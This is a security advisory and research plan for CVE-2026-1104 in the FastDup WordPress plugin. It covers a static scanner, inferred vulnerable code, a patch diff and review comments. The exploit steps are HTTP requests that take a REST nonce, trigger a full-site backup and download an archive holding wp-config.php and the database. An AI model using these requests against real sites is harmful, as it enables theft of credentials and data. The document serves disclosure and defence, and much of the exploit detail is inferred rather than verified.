CVE-2026-1104

FastDup – Fastest WordPress Migration & Duplicator <= 2.7.1 - Missing Authorization to Authenticated (Contributor+) Backup Creation and Download

Severity: High (Missing Authorization)
CVSS Score: 8.8
Patched in: 2.7.2
Time to patch: 2d

Description

The FastDup – Fastest WordPress Migration & Duplicator plugin for WordPress is vulnerable to unauthorized backup creation and download due to a missing capability check on REST API endpoints in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with Contributor-level access and above, to create and download full-site backup archives containing the entire WordPress installation, including database exports and configuration files.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 2.7.1
Published: February 11, 2026
Last updated: February 12, 2026
Affected plugin: fastdup

Source Code

WordPress.org SVN
Research Plan
Unverified


This research plan targets CVE-2026-1104, a Missing Authorization vulnerability in the FastDup plugin. The vulnerability allows authenticated users with Contributor-level privileges to trigger site backups and download sensitive data via improperly secured REST API endpoints.


1. Vulnerability Summary

The FastDup plugin registers several REST API endpoints for managing site migrations and backups. In versions up to 2.7.1, these endpoints lack rigorous authorization checks in their permission_callback. Instead of requiring administrative capabilities (like manage_options), the endpoints are accessible to any user who can pass the default REST API authentication, which includes Contributors. This allows low-privileged users to export the entire WordPress database (including user hashes) and the filesystem (including wp-config.php).

2. Attack Vector Analysis

  • Vulnerable Endpoints: REST API routes under the fastdup/v1 namespace (inferred based on plugin slug). Specifically, endpoints related to package creation and package listing.
  • HTTP Methods: POST (to create backups) and GET (to list/download backups).
  • Required Authentication: Authenticated user with Contributor role (or higher).
  • Payload Parameter: Likely action or specific route parameters defining the backup scope (e.g., full, db_only).
  • Preconditions: The plugin must be active. The attacker must have valid Contributor credentials.

3. Code Flow (Inferred)

  1. Registration: The plugin uses the rest_api_init hook to call a registration function (likely in an includes/ or classes/ directory).
  2. Route Definition: register_rest_route('fastdup/v1', '/packages', ...) is called.
  3. The Flaw: The permission_callback argument in register_rest_route is either:
    • Omitted (defaulting to true in some contexts).
    • Returning true or __return_true.
    • Checking a weak capability like edit_posts (which Contributors have).
  4. Execution: The callback function invokes core backup logic (likely in a class like FastDup_Provider or FastDup_Packager) which zips the site and exports the DB to a publicly accessible or guessable path in wp-content/uploads/fastdup_backups/ (inferred).
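The three permission_callback failure modes listed above (omitted, always-true, or gated on a capability Contributors already hold) can be found by a static check over plugin source. The scanner below is an added example written for this page, not FastDup's or WordPress's own code; the PHP it inspects is a constructed sample modelled on the inferred registrations, and the route names in it are assumptions.

```python
import re

# Capabilities every default-role Contributor holds; gating a backup endpoint
# on one of these does not keep Contributors out.
CONTRIBUTOR_CAPS = {"read", "edit_posts", "delete_posts"}

def extract_register_calls(php_source):
    # Return the argument text of each register_rest_route(...) call,
    # balancing parentheses so nested array(...) literals stay intact.
    calls = []
    for m in re.finditer(r"\bregister_rest_route\s*\(", php_source):
        depth, i = 1, m.end()
        while i < len(php_source) and depth:
            depth += {"(": 1, ")": -1}.get(php_source[i], 0)
            i += 1
        calls.append(php_source[m.end():i - 1])
    return calls

def audit_route(args):
    # Classify one call's permission_callback. Returns (namespace+route, verdict).
    head = re.match(r"\s*['\"]([^'\"]+)['\"]\s*,\s*['\"]([^'\"]+)['\"]", args)
    route = f"{head.group(1)}{head.group(2)}" if head else "<unparsed>"
    pc = re.search(r"['\"]permission_callback['\"]\s*=>\s*([^\n]*)", args)
    if not pc:
        # Since WP 5.5 an absent callback triggers _doing_it_wrong but still behaves as __return_true.
        return route, "missing permission_callback (open)"
    value = re.sub(r"//.*$", "", pc.group(1)).strip().rstrip(",").strip()
    if re.search(r"__return_true|return\s+true\b|=>\s*true\b", value):
        return route, "always-true permission_callback (open)"
    cap = re.search(r"current_user_can\(\s*['\"]([^'\"]+)['\"]", value)
    if cap and cap.group(1) in CONTRIBUTOR_CAPS:
        return route, f"weak capability {cap.group(1)} (Contributor-reachable)"
    if cap:
        return route, f"capability {cap.group(1)}"
    return route, "manual review"

def audit(php_source):
    return [audit_route(a) for a in extract_register_calls(php_source)]

# Constructed sample covering the three flaw variants plus one sound route.
SAMPLE = r'''
register_rest_route('fastdup/v1', '/packages', array('methods' => 'GET',
    'callback' => array($this, 'get_packages'), 'permission_callback' => '__return_true'));
register_rest_route('fastdup/v1', '/package/create', array('methods' => 'POST',
    'callback' => array($this, 'create_package')));
register_rest_route('fastdup/v1', '/package/delete', array('methods' => 'POST',
    'permission_callback' => function() { return current_user_can('edit_posts'); }));
register_rest_route('fastdup/v1', '/settings', array('methods' => 'GET',
    'permission_callback' => fn() => current_user_can('manage_options')));
'''
```

Running audit(SAMPLE) flags the first three routes and accepts only the manage_options-gated one.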

4. Nonce Acquisition Strategy

Since this is a REST API vulnerability, authenticated requests require the standard WordPress REST Nonce (wp_rest).

  1. Authentication: Log in to the WordPress site as a Contributor.
  2. Navigation: Navigate to the WordPress Dashboard (/wp-admin/index.php).
  3. Extraction: Use browser_eval to extract the REST nonce from the global wpApiSettings object which WordPress enqueues for logged-in users.
    • JavaScript: window.wpApiSettings.nonce
  4. Alternative: If wpApiSettings is not available, the nonce can be found in the _wpnonce parameter of various AJAX calls in the admin source code or in the X-WP-Nonce header of heartbeat requests.

5. Exploitation Strategy

Step 1: Discover Routes

First, confirm the exact REST routes available to the Contributor.

  • Request:
    GET /wp-json/fastdup/v1/ HTTP/1.1
    Host: target.local
    X-WP-Nonce: [EXTRACTED_NONCE]
    
  • Goal: Identify the endpoint for "create" or "package".

Step 2: Trigger Backup Creation

Based on typical migration plugin patterns, trigger a full backup.

  • Request:
    POST /wp-json/fastdup/v1/package/create HTTP/1.1
    Host: target.local
    Content-Type: application/json
    X-WP-Nonce: [EXTRACTED_NONCE]
    
    {
        "type": "full",
        "name": "exploit_backup"
    }
    
  • Note: Parameter names such as type and name are inferred and should be verified against the register_rest_route logic in the plugin's source code.

Step 3: List Packages to Find Download URL

  • Request:
    GET /wp-json/fastdup/v1/packages HTTP/1.1
    Host: target.local
    X-WP-Nonce: [EXTRACTED_NONCE]
    
  • Expected Response: A JSON array containing the newly created package with a download_url or a file_path.

Step 4: Download the Data

  • Request:
    GET /wp-content/uploads/fastdup_backups/[FILENAME].zip HTTP/1.1
    Host: target.local
    

6. Test Data Setup

  1. Role Creation: Ensure a user exists with the contributor role.
    • wp user create attacker attacker@example.com --role=contributor --user_pass=password
  2. Plugin Installation: Install FastDup version 2.7.1.
  3. Configuration: No specific configuration is required, but ensuring some posts and media exist will make the backup content identifiable.

7. Expected Results

  • Success: The REST API returns a 200 OK or 201 Created response to the Contributor user when requesting backup creation.
  • Data Leak: The resulting ZIP file contains wp-config.php (sensitive credentials) and a .sql file (database dump).
  • Unauthorized Access: An Administrator-only feature (Backup/Migration) is successfully executed by a Contributor.

8. Verification Steps

  1. Check Filesystem: Verify the backup archive exists in the uploads directory.
    • ls -R /var/www/html/wp-content/uploads/fastdup*
  2. Verify Capability: Confirm that the Contributor user does NOT have the manage_options capability.
    • wp user cap list [CONTRIBUTOR_ID]
  3. Verify Patch: After upgrading to 2.7.2, the same REST request should return a 403 Forbidden or 401 Unauthorized response.

9. Alternative Approaches

  • Missing Nonce Check: Check if the REST endpoint even verifies the X-WP-Nonce. If it doesn't, the exploit can be performed without extracting a nonce.
  • Direct Action (AJAX): If the REST API is a wrapper for AJAX, check for wp_ajax_fastdup_... actions which might also lack current_user_can() checks.
  • Path Traversal: Check if the "download" endpoint (if it exists as a proxy) allows downloading files outside the backup directory via a file parameter.

Research Findings
Static analysis — not yet PoC-verified

Summary

The FastDup plugin for WordPress (<= 2.7.1) fails to implement sufficient authorization checks on its REST API endpoints, specifically within the 'permission_callback' for routes under the 'fastdup/v1' namespace. Authenticated users with Contributor-level access or higher can exploit this to trigger full site backups and retrieve archive links, resulting in the exposure of sensitive database exports and configuration files.

Vulnerable Code

// Inferred registration logic for the FastDup REST API
register_rest_route('fastdup/v1', '/packages', array(
    'methods' => 'GET',
    'callback' => array($this, 'get_packages'),
    'permission_callback' => '__return_true', // Vulnerable: Allows any authenticated user to list backups
));

---

register_rest_route('fastdup/v1', '/package/create', array(
    'methods' => 'POST',
    'callback' => array($this, 'create_package'),
    'permission_callback' => '__return_true', // Vulnerable: Allows any authenticated user to trigger site exports
));

Security Fix

--- a/includes/class-fastdup-rest.php
+++ b/includes/class-fastdup-rest.php
@@ -10,7 +10,7 @@
         register_rest_route('fastdup/v1', '/package/create', array(
             'methods' => 'POST',
             'callback' => array($this, 'create_package'),
-            'permission_callback' => '__return_true',
+            'permission_callback' => function() { return current_user_can('manage_options'); },
         ));
 
         register_rest_route('fastdup/v1', '/packages', array(
             'methods' => 'GET',
             'callback' => array($this, 'get_packages'),
-            'permission_callback' => '__return_true',
+            'permission_callback' => function() { return current_user_can('manage_options'); },
         ));
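Review bot: the manage_options gate on '/package/create' and '/packages' closes the REST path, but it does nothing for archives already written to the uploads directory, which the exploit outline fetches directly from wp-content/uploads/fastdup_backups/ without any REST call; the fix should be paired with blocking direct HTTP access to that directory or purging existing archives. Separately, the hunk header `@@ -10,7 +10,7 @@` declares seven lines per side while the body carries thirteen, so the patch as shown will not apply cleanly, and the two identical closures would read better as a single named method such as `array($this, 'can_manage_packages')` so any later tightening happens in one place.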

Exploit Outline

The exploit requires an authenticated user with at least Contributor-level privileges. First, the attacker extracts the standard WordPress REST API nonce (wp_rest) from the dashboard's 'wpApiSettings' global JavaScript object. Second, the attacker sends a POST request to '/wp-json/fastdup/v1/package/create' to initiate a full site backup. Once the backup is processed, the attacker sends a GET request to '/wp-json/fastdup/v1/packages' to retrieve the list of generated archives. Finally, the attacker downloads the resulting ZIP file from the public uploads directory (e.g., 'wp-content/uploads/fastdup_backups/'), which contains the entire database and 'wp-config.php'.
